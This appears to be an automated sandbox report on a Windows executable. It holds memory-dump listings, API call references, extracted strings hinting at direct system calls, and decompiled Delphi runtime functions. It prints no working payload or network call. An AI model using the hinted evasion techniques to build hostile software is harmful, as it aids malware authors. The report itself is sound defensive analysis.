                                                0x00402f67
                                                0x00402f7a
                                                0x00402f7c
                                                0x00402f7e
                                                0x00402f80
                                                0x00402f86
                                                0x00402f8a
                                                0x00402f8a
                                                0x00402f8d
                                                0x00402f8d
                                                0x00402f96
                                                0x00402f9d
                                                0x00402f9d
                                                0x00402f69
                                                0x00402f69
                                                0x00402f6e
                                                0x00402f6e
                                                0x00402e84
                                                0x00402e8d
                                                0x00402e93
                                                0x00402e8f
                                                0x00402e8f
                                                0x00402e8f
                                                0x00402e9f
                                                0x00402eae
                                                0x00402ebb
                                                0x00402f2b
                                                0x00402f32
                                                0x00402f34
                                                0x00402f36
                                                0x00402f38
                                                0x00402f3e
                                                0x00402f42
                                                0x00402f42
                                                0x00402f45
                                                0x00402f45
                                                0x00402f55
                                                0x00402f5c
                                                0x00402f5c
                                                0x00402ebd
                                                0x00402ebd
                                                0x00402ec9
                                                0x00402ecf
                                                0x00000000
                                                0x00402ed1
                                                0x00402ee2
                                                0x00402ee6
                                                0x00402ee8
                                                0x00402ee8
                                                0x00402efe
                                                0x00000000
                                                0x00402f16
                                                0x00402f18
                                                0x00402f1b
                                                0x00402f24
                                                0x00402f27
                                                0x00402f27
                                                0x00402efe
                                                0x00402ecf
                                                0x00402ebb
                                                0x00402fab
                                                0x0040383b
                                                0x0040383b
                                                0x0040383d
                                                0x0040383d
                                                0x004035c9
                                                0x004035cb
                                                0x004035ce
                                                0x004035cf
                                                0x004035d2
                                                0x004035d5
                                                0x004035d8
                                                0x004035da
                                                0x004035db
                                                0x004036f0
                                                0x004036f3
                                                0x004036f5
                                                0x004037e8
                                                0x004037f3
                                                0x004037fa
                                                0x004037fc
                                                0x004037ff
                                                0x00403804
                                                0x00403805
                                                0x00403807
                                                0x00000000
                                                0x00403809
                                                0x00403809
                                                0x0040380f
                                                0x00403811
                                                0x00403811
                                                0x00403814
                                                0x0040381c
                                                0x00403823
                                                0x0040382e
                                                0x0040382e
                                                0x004036fb
                                                0x004036fb
                                                0x004036fe
                                                0x00403701
                                                0x00403703
                                                0x00000000
                                                0x00403709
                                                0x00403709
                                                0x00403710
                                                0x0040376d
                                                0x0040376d
                                                0x00403772
                                                0x00403778
                                                0x0040377d
                                                0x0040377e
                                                0x0040377e
                                                0x0040378a
                                                0x0040379b
                                                0x004037a1
                                                0x004037a1
                                                0x004037a3
                                                0x004037b0
                                                0x004037b7
                                                0x004037bb
                                                0x004037bd
                                                0x004037c3
                                                0x004037c5
                                                0x004037c7
                                                0x004037c7
                                                0x004037a5
                                                0x004037a5
                                                0x004037a9
                                                0x004037a9
                                                0x004037cc
                                                0x004037cc
                                                0x004037ce
                                                0x004037d1
                                                0x004037d8
                                                0x004037da
                                                0x004037de
                                                0x00403712
                                                0x00403712
                                                0x00403717
                                                0x0040371f
                                                0x00000000
                                                0x00000000
                                                0x00403721
                                                0x00403723
                                                0x0040372a
                                                0x00000000
                                                0x0040372c
                                                0x00403730
                                                0x00403735
                                                0x00403736
                                                0x0040373c
                                                0x00403744
                                                0x0040374a
                                                0x0040374f
                                                0x00403750
                                                0x00000000
                                                0x00403750
                                                0x00403744
                                                0x00000000
                                                0x0040372a
                                                0x00403759
                                                0x0040375c
                                                0x0040375f
                                                0x00403761
                                                0x004037e1
                                                0x004037e1
                                                0x00000000
                                                0x00403763
                                                0x00403763
                                                0x00403766
                                                0x00403769
                                                0x0040376b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040376b
                                                0x00403761
                                                0x00403710
                                                0x00403703
                                                0x004035e1
                                                0x004035e4
                                                0x004035e6
                                                0x004035f0
                                                0x004035f6
                                                0x0040360d
                                                0x0040360d
                                                0x00403619
                                                0x0040361f
                                                0x00403621
                                                0x00403628
                                                0x0040362a
                                                0x0040362f
                                                0x00403637
                                                0x00000000
                                                0x00000000
                                                0x00403639
                                                0x0040363b
                                                0x00403642
                                                0x00000000
                                                0x00403644
                                                0x00403647
                                                0x0040364c
                                                0x00403652
                                                0x0040365a
                                                0x0040365f
                                                0x00403664
                                                0x00000000
                                                0x00403664
                                                0x0040365a
                                                0x00000000
                                                0x00403642
                                                0x0040366d
                                                0x0040366d
                                                0x0040366d
                                                0x00403672
                                                0x00403675
                                                0x00403677
                                                0x0040367a
                                                0x0040367d
                                                0x00403688
                                                0x0040368a
                                                0x0040368d
                                                0x0040368f
                                                0x00403691
                                                0x00403697
                                                0x00403699
                                                0x00403699
                                                0x0040367f
                                                0x00403682
                                                0x00403682
                                                0x0040369e
                                                0x004036a4
                                                0x004036a8
                                                0x004036ae
                                                0x004036b5
                                                0x004036b5
                                                0x004036ba
                                                0x004036c7
                                                0x004035f8
                                                0x004035f8
                                                0x004035fe
                                                0x004036c8
                                                0x004036cc
                                                0x004036d1
                                                0x004036d3
                                                0x004036d5
                                                0x004036dd
                                                0x004036e4
                                                0x004036e9
                                                0x004036e9
                                                0x004036ef
                                                0x00403604
                                                0x00403604
                                                0x00403609
                                                0x0040360b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040360b
                                                0x004035fe
                                                0x004035e8
                                                0x004035e8
                                                0x004035ec
                                                0x004035ec
                                                0x004035e6
                                                0x004035db
                                                0x00403538
                                                0x00403538
                                                0x0040353a
                                                0x0040353e
                                                0x00403541
                                                0x00403543
                                                0x0040357c
                                                0x00403580
                                                0x00403581
                                                0x00403583
                                                0x00403585
                                                0x00403587
                                                0x0040358a
                                                0x0040358c
                                                0x0040358e
                                                0x00403593
                                                0x00403595
                                                0x00403597
                                                0x0040359d
                                                0x0040359f
                                                0x0040359f
                                                0x004035a6
                                                0x004035a6
                                                0x004035a9
                                                0x004035ab
                                                0x004035b4
                                                0x004035b9
                                                0x004035b9
                                                0x004035bb
                                                0x004035bc
                                                0x004035bd
                                                0x004035be
                                                0x00403545
                                                0x00403545
                                                0x0040354c
                                                0x0040354e
                                                0x00403554
                                                0x00403556
                                                0x00403558
                                                0x0040355d
                                                0x0040355f
                                                0x00403561
                                                0x00403563
                                                0x00403565
                                                0x00403570
                                                0x00403575
                                                0x00403575
                                                0x00403577
                                                0x00403578
                                                0x00403579
                                                0x00403550
                                                0x00403550
                                                0x00403551
                                                0x00403552
                                                0x00403552
                                                0x0040354e
                                                0x00403543

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3183777298c1953730924ae46fe703b514a5b9445081ccb82ff3e28789d1999b
                                                • Instruction ID: 03e027181e797ee74e0e208850b210cacaba8f3fa97c8cd7352cecbef8438de8
                                                • Opcode Fuzzy Hash: 3183777298c1953730924ae46fe703b514a5b9445081ccb82ff3e28789d1999b
                                                • Instruction Fuzzy Hash: 11C146A27102011BD714AE7DDE8976EB7999BC4316F18823FF504EB3D2DABCC9458348
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00000000), ref: 00863C16
                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00000000), ref: 00863DE6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: NamePathShort
                                                • String ID: KiFastSystemCall$NtAlpcCreateSectionView$Z$vds.exe
                                                • API String ID: 1295925010-1335456658
                                                • Opcode ID: 23d48eafaaa863904ca986844ce5866d1a09921b8318287c91bf3a3f28abedd6
                                                • Instruction ID: 3ed59f7a06b7e5e64e7eab2f35ab7c230cae75af575dc9c8b9436602fecf8007
                                                • Opcode Fuzzy Hash: 23d48eafaaa863904ca986844ce5866d1a09921b8318287c91bf3a3f28abedd6
                                                • Instruction Fuzzy Hash: F902E474A10248EFDB10CFAAE985AADBBF1FB08306B118536E405E7370D774A961CF19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3ad6521ae12515eb28223b666269dac296373ae40520598bf23df21f4c4dd2f1
                                                • Instruction ID: d0bcd14a6e0e49d86c59fb88a46d8f141ce1466ac89bcfd3b644c21892c97a9a
                                                • Opcode Fuzzy Hash: 3ad6521ae12515eb28223b666269dac296373ae40520598bf23df21f4c4dd2f1
                                                • Instruction Fuzzy Hash: 45B127A27006044BDF149A7CDC8576EB3859BC43A1F18C239F25CCB396EA7CDE46A351
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0077BB14
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID:
                                                • API String ID: 3997070919-0
                                                • Opcode ID: 3c69c3a2c73478c5e45cecb158df72672313abf9503702f4a583c6c81048d671
                                                • Instruction ID: 23058478752afdd8d0cf0ef6e2473ff5ff3cb86f5334748de15c61facf7de239
                                                • Opcode Fuzzy Hash: 3c69c3a2c73478c5e45cecb158df72672313abf9503702f4a583c6c81048d671
                                                • Instruction Fuzzy Hash: 96A160B5A00249DFDF21CFA8D885BAEB7B5FF58340F14C129E509A7391DB78A944CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00775F84: GetCurrentThreadId.KERNEL32 ref: 00775F87
                                                • GetTickCount.KERNEL32 ref: 00775B2F
                                                • GetTickCount.KERNEL32 ref: 00775B47
                                                • GetCurrentThreadId.KERNEL32 ref: 00775B76
                                                • GetTickCount.KERNEL32 ref: 00775BA1
                                                • GetTickCount.KERNEL32 ref: 00775BD8
                                                • GetTickCount.KERNEL32 ref: 00775C02
                                                • GetCurrentThreadId.KERNEL32 ref: 00775C72
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: CountTick$CurrentThread
                                                • String ID:
                                                • API String ID: 3968769311-0
                                                • Opcode ID: 8e05b2835f912d5448ddb0ab1285d504b76c81195dda1a43b3c6481437eb11fb
                                                • Instruction ID: 8ad3e24297488830315a5dfdd59308e3cfd4d44b4b63b493f0c3c0b129ee32b8
                                                • Opcode Fuzzy Hash: 8e05b2835f912d5448ddb0ab1285d504b76c81195dda1a43b3c6481437eb11fb
                                                • Instruction Fuzzy Hash: 58418671608B418EDF21EF7CC48432EBBD1AF94394F15C92CD4DC87292E7B998819792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00787647
                                                • GetModuleFileNameW.KERNEL32(00503620,?,00000105,?,?,00000105), ref: 00787662
                                                • LoadStringW.USER32(00000000,0040C120,?,00000100), ref: 007876FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: FileModuleName$LoadString
                                                • String ID: `uA$`uA$duA
                                                • API String ID: 213155056-422646958
                                                • Opcode ID: c544facb1dd57c42c7e708fe08ed04c52eccc436e6b324ec1a69ba7e0a3735da
                                                • Instruction ID: 6bffa47ef9141a09e348480a5059cf06815b14a378e95ae108f29a619660f5d1
                                                • Opcode Fuzzy Hash: c544facb1dd57c42c7e708fe08ed04c52eccc436e6b324ec1a69ba7e0a3735da
                                                • Instruction Fuzzy Hash: F5413C70A44618DFDB20EF68CC85AC9B7FAAB49340F5080E6E508E7251E77A9E94CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007875F0: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00787647
                                                  • Part of subcall function 007875F0: GetModuleFileNameW.KERNEL32(00503620,?,00000105,?,?,00000105), ref: 00787662
                                                  • Part of subcall function 007875F0: LoadStringW.USER32(00000000,0040C120,?,00000100), ref: 007876FD
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0078787C
                                                • GetStdHandle.KERNEL32(000000F4,004176D8,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 007878A8
                                                • WriteFile.KERNEL32(00000000,000000F4,004176D8,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 007878AE
                                                • LoadStringW.USER32(00000000,0040C0A8,?,00000040), ref: 007878D2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: File$LoadModuleNameString$ByteCharHandleMultiWideWrite
                                                • String ID: PRQDl$luA
                                                • API String ID: 1413667788-1867814159
                                                • Opcode ID: f9032f570ae7a13e91aa6ede140f78ce3a7f3cb139baf9ce415d91c86863261d
                                                • Instruction ID: ab2304e43740b7b4e24152c8399c17bafc35e6a66a90b0d4734dccd182eef3ac
                                                • Opcode Fuzzy Hash: f9032f570ae7a13e91aa6ede140f78ce3a7f3cb139baf9ce415d91c86863261d
                                                • Instruction Fuzzy Hash: 213186B1684204FFEB15E794CC46FEA77ACEB08750F608065B608E71D2DE746E40CB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 36%
                                                			E00405620(void* __edx) {
                                                				signed int _v8;
                                                				intOrPtr _v12;
                                                				char _v16;
                                                				char* _t23;
                                                				intOrPtr _t29;
                                                				intOrPtr _t39;
                                                				void* _t41;
                                                				void* _t43;
                                                				intOrPtr _t44;
                                                
                                                				_t41 = _t43;
                                                				_t44 = _t43 + 0xfffffff4;
                                                				_v16 = 0;
                                                				if(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetLogicalProcessorInformation") == 0) {
                                                					L10:
                                                					_v8 = 0x40;
                                                					goto L11;
                                                				} else {
                                                					_t23 =  &_v16;
                                                					_push(_t23);
                                                					_push(0);
                                                					L004028CC();
                                                					if(_t23 != 0 || GetLastError() != 0x7a) {
                                                						goto L10;
                                                					} else {
                                                						_v12 = E004044B4(_v16);
                                                						_push(_t41);
                                                						_push(E004056CE);
                                                						_push( *[fs:edx]);
                                                						 *[fs:edx] = _t44;
                                                						_push( &_v16);
                                                						_push(_v12);
                                                						L004028CC();
                                                						_t29 = _v12;
                                                						if(_v16 <= 0) {
                                                							L8:
                                                							_pop(_t39);
                                                							 *[fs:eax] = _t39;
                                                							_push(E004056D5);
                                                							return E004044D0(_v12);
                                                						} else {
                                                							while( *((short*)(_t29 + 4)) != 2 ||  *((char*)(_t29 + 8)) != 1) {
                                                								_t29 = _t29 + 0x18;
                                                								_v16 = _v16 - 0x18;
                                                								if(_v16 > 0) {
                                                									continue;
                                                								} else {
                                                									goto L8;
                                                								}
                                                								goto L12;
                                                							}
                                                							_v8 =  *(_t29 + 0xa) & 0x0000ffff;
                                                							E00406264();
                                                							L11:
                                                							return _v8;
                                                						}
                                                					}
                                                				}
                                                				L12:
                                                			}












                                                0x00405621
                                                0x00405623
                                                0x00405628
                                                0x00405642
                                                0x004056d5
                                                0x004056d5
                                                0x00000000
                                                0x00405648
                                                0x00405648
                                                0x0040564b
                                                0x0040564c
                                                0x0040564e
                                                0x00405655
                                                0x00000000
                                                0x00405661
                                                0x00405669
                                                0x0040566e
                                                0x0040566f
                                                0x00405674
                                                0x00405677
                                                0x0040567d
                                                0x00405681
                                                0x00405682
                                                0x00405687
                                                0x0040568e
                                                0x004056b8
                                                0x004056ba
                                                0x004056bd
                                                0x004056c0
                                                0x004056cd
                                                0x00405690
                                                0x00405690
                                                0x004056ab
                                                0x004056ae
                                                0x004056b6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004056b6
                                                0x004056a1
                                                0x004056a4
                                                0x004056dc
                                                0x004056e2
                                                0x004056e2
                                                0x0040568e
                                                0x00405655
                                                0x00000000

                                                APIs
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00405635
                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040563B
                                                • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 00405657
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: AddressErrorHandleLastModuleProc
                                                • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                • API String ID: 4275029093-79381301
                                                • Opcode ID: c2084c094475ba784c2c756125d5cc50a2fab7027d67d9af656c44ef014f062f
                                                • Instruction ID: 619608bb65db88defe486723605b8ecd8e02af69365a59580d4b8b268f9d3c7c
                                                • Opcode Fuzzy Hash: c2084c094475ba784c2c756125d5cc50a2fab7027d67d9af656c44ef014f062f
                                                • Instruction Fuzzy Hash: AE113371D00608AFDB10EBA5C94575FB7B8DB40318F6088BBE418B76C1D67D89448E59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetStdHandle.KERNEL32(000000F4,)@,00000000,?,00000000,00000000,000000F4,)@,00000000,?,00000000,?,?,00000000,0077446F), ref: 00773B0B
                                                • WriteFile.KERNEL32(00000000,000000F4,)@,00000000,?,00000000,00000000,000000F4,)@,00000000,?,00000000,?,?,00000000,0077446F), ref: 00773B11
                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,)@,00000000,?,00000000,00000000,000000F4,)@,00000000,?), ref: 00773B28
                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,)@,00000000,?,00000000,00000000,000000F4,)@,00000000), ref: 00773B2E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: FileHandleWrite
                                                • String ID: )@$)@
                                                • API String ID: 3320372497-924509997
                                                • Opcode ID: 8e71eb6d23d6d8ab8cfadc474005c443bbeeb358ce6ec74b12084cc19a9b66c0
                                                • Instruction ID: fc52ceb9504e5bbcac9d0c520a4f2e3c73bd759d61c4e0049bf784d48ec03dd1
                                                • Opcode Fuzzy Hash: 8e71eb6d23d6d8ab8cfadc474005c443bbeeb358ce6ec74b12084cc19a9b66c0
                                                • Instruction Fuzzy Hash: F70136D1604211FDE900F7A89C8EFAB278C8B057A8F148621762CE20D3D92C5D49D679
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 43%
                                                			E0040670C(void* __ecx) {
                                                				long _v4;
                                                				void* _t3;
                                                				void* _t9;
                                                
                                                				if( *0x500054 == 0) {
                                                					if( *0x4fd026 == 0) {
                                                						_push(0);
                                                						_push("Error");
                                                						_push("Runtime error     at 00000000");
                                                						_push(0);
                                                						L00402844();
                                                					}
                                                					return _t3;
                                                				} else {
                                                					if( *0x500340 == 0xd7b2 &&  *0x500348 > 0) {
                                                						 *0x500358();
                                                					}
                                                					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1d,  &_v4, 0);
                                                					_t9 = E00406FFC(0x4067a0);
                                                					return WriteFile(GetStdHandle(0xfffffff5), _t9, 2,  &_v4, 0);
                                                				}
                                                			}






                                                0x00406714
                                                0x0040677a
                                                0x0040677c
                                                0x0040677e
                                                0x00406783
                                                0x00406788
                                                0x0040678a
                                                0x0040678a
                                                0x00406790
                                                0x00406716
                                                0x0040671f
                                                0x0040672f
                                                0x0040672f
                                                0x0040674b
                                                0x0040675e
                                                0x00406772
                                                0x00406772

                                                APIs
                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA,?,?,004FC554,?,004068DE,004045A3,004045EA), ref: 00406745
                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA,?,?,004FC554,?,004068DE,004045A3,004045EA), ref: 0040674B
                                                • GetStdHandle.KERNEL32(000000F5,00000000,00000002,004FC554,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA,?,?,004FC554), ref: 00406766
                                                • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,004FC554,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA), ref: 0040676C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileHandleWrite
                                                • String ID: Error$Runtime error at 00000000
                                                • API String ID: 3320372497-2970929446
                                                • Opcode ID: eda4de2550d5145e072844f60e8d4c50491e1b9c71102fdff190c436ce87094c
                                                • Instruction ID: b37dff71a96f27208a7e33f64d0fbb077a09dd40f3e9c51218416e66017629e3
                                                • Opcode Fuzzy Hash: eda4de2550d5145e072844f60e8d4c50491e1b9c71102fdff190c436ce87094c
                                                • Instruction Fuzzy Hash: 33F0F6A0A443047AF611B3945D4AFAE275C8B40B1DF61063FF7107A0D2DAFC48C8922E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlLeaveCriticalSection.NTDLL(00502C0C), ref: 007790EA
                                                • RtlEnterCriticalSection.NTDLL(00502C0C), ref: 00779168
                                                • RtlLeaveCriticalSection.NTDLL(00502C0C), ref: 00779191
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: CriticalSection$Leave$Enter
                                                • String ID: en-US,en,
                                                • API String ID: 2978645861-3579323720
                                                • Opcode ID: 1ebe573edee942a8ff334357550a8f6dabcec30c9967b4c44dfadf6ec17d7289
                                                • Instruction ID: ed6d91cdb56a7d0dfde5e08c0a72d4c4522b8b6c22ff08e6fe1425239c2255d8
                                                • Opcode Fuzzy Hash: 1ebe573edee942a8ff334357550a8f6dabcec30c9967b4c44dfadf6ec17d7289
                                                • Instruction Fuzzy Hash: DB21C320704205E7EF25B7788C4E62D2699AB48790F60C822F64C932D3DD7C9D02CA66
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A,?,?,?,?,00776B2E,007747F3,0077483A), ref: 00776995
                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A,?,?,?,?,00776B2E,007747F3,0077483A), ref: 0077699B
                                                • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A,?,?,?), ref: 007769B6
                                                • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A), ref: 007769BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: FileHandleWrite
                                                • String ID: Runtime error at 00000000
                                                • API String ID: 3320372497-1393363852
                                                • Opcode ID: 4c568e31d2edb777dba30f4ee85161ac086da8f41786dad9347262c7ad6e2a72
                                                • Instruction ID: 7b59f6c28421e3c9bdb8d8a9d97b09fdf9d038813b9056169aed2a65bfc0407e
                                                • Opcode Fuzzy Hash: 4c568e31d2edb777dba30f4ee85161ac086da8f41786dad9347262c7ad6e2a72
                                                • Instruction Fuzzy Hash: B0F0F6A0A44300B9EE10B3A44C0FFBD27589740F55F68951AB728780D7CABC68C99A25
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Sleep.KERNEL32(00000000,?,?,00000000,007731F2), ref: 00773616
                                                • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,007731F2), ref: 00773630
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: f44237ee4e40f2228f8e82a2b21e0a766cbb1adddc56f87a23eb6cfeadbeb2bb
                                                • Instruction ID: 822a6ed0a2c3abf572c95960dfe26981dd730f598bdc399bda5ba68a6bc4729b
                                                • Opcode Fuzzy Hash: f44237ee4e40f2228f8e82a2b21e0a766cbb1adddc56f87a23eb6cfeadbeb2bb
                                                • Instruction Fuzzy Hash: 2861D1716012809FEB15CF28C989B5ABBD0AB95390F18C1AEE44CCB392D679CE45EB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 008645CB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: DirectoryWindows
                                                • String ID: "$*$NtSetDefaultLocale
                                                • API String ID: 3619848164-1193084605
                                                • Opcode ID: c59c192a5197979d71822e1f3e3513f585cbd6a727926c0a443b641e7b3fe29d
                                                • Instruction ID: 868650d0a5d7a990ef1e6031e728ab27058ae7038359694946a22c3a9c71a977
                                                • Opcode Fuzzy Hash: c59c192a5197979d71822e1f3e3513f585cbd6a727926c0a443b641e7b3fe29d
                                                • Instruction Fuzzy Hash: 28E10574D00258DFCB50DFAAE988AADBBF1FB09302F21953AE409E7225D7349951CF19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 00776A2A
                                                • FreeLibrary.KERNEL32(00400000,?,?,?,?,00776B2E,007747F3,0077483A,?,?,00774853), ref: 00776AC8
                                                • ExitProcess.KERNEL32(00000000,?,?,?,?,00776B2E,007747F3,0077483A,?,?,00774853), ref: 00776B01
                                                  • Part of subcall function 0077695C: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A,?,?,?,?,00776B2E,007747F3,0077483A), ref: 00776995
                                                  • Part of subcall function 0077695C: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A,?,?,?,?,00776B2E,007747F3,0077483A), ref: 0077699B
                                                  • Part of subcall function 0077695C: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A,?,?,?), ref: 007769B6
                                                  • Part of subcall function 0077695C: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A), ref: 007769BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                • String ID: MZP
                                                • API String ID: 3490077880-2889622443
                                                • Opcode ID: 23b108cd9283b6578c60080867c59299f4d863ae87d8b998b6c8ab3550617874
                                                • Instruction ID: c5cd6e3b90d30b6bff5c0e69b8756c58925350faed7324223d4983b47ec13941
                                                • Opcode Fuzzy Hash: 23b108cd9283b6578c60080867c59299f4d863ae87d8b998b6c8ab3550617874
                                                • Instruction Fuzzy Hash: B331A420A00B41DFDF31AB74884C71A7BE06F15394F16C829E54D9729AD77CDC88CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 00776A2A
                                                • FreeLibrary.KERNEL32(00400000,?,?,?,?,00776B2E,007747F3,0077483A,?,?,00774853), ref: 00776AC8
                                                • ExitProcess.KERNEL32(00000000,?,?,?,?,00776B2E,007747F3,0077483A,?,?,00774853), ref: 00776B01
                                                  • Part of subcall function 0077695C: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A,?,?,?,?,00776B2E,007747F3,0077483A), ref: 00776995
                                                  • Part of subcall function 0077695C: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A,?,?,?,?,00776B2E,007747F3,0077483A), ref: 0077699B
                                                  • Part of subcall function 0077695C: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A,?,?,?), ref: 007769B6
                                                  • Part of subcall function 0077695C: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A), ref: 007769BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
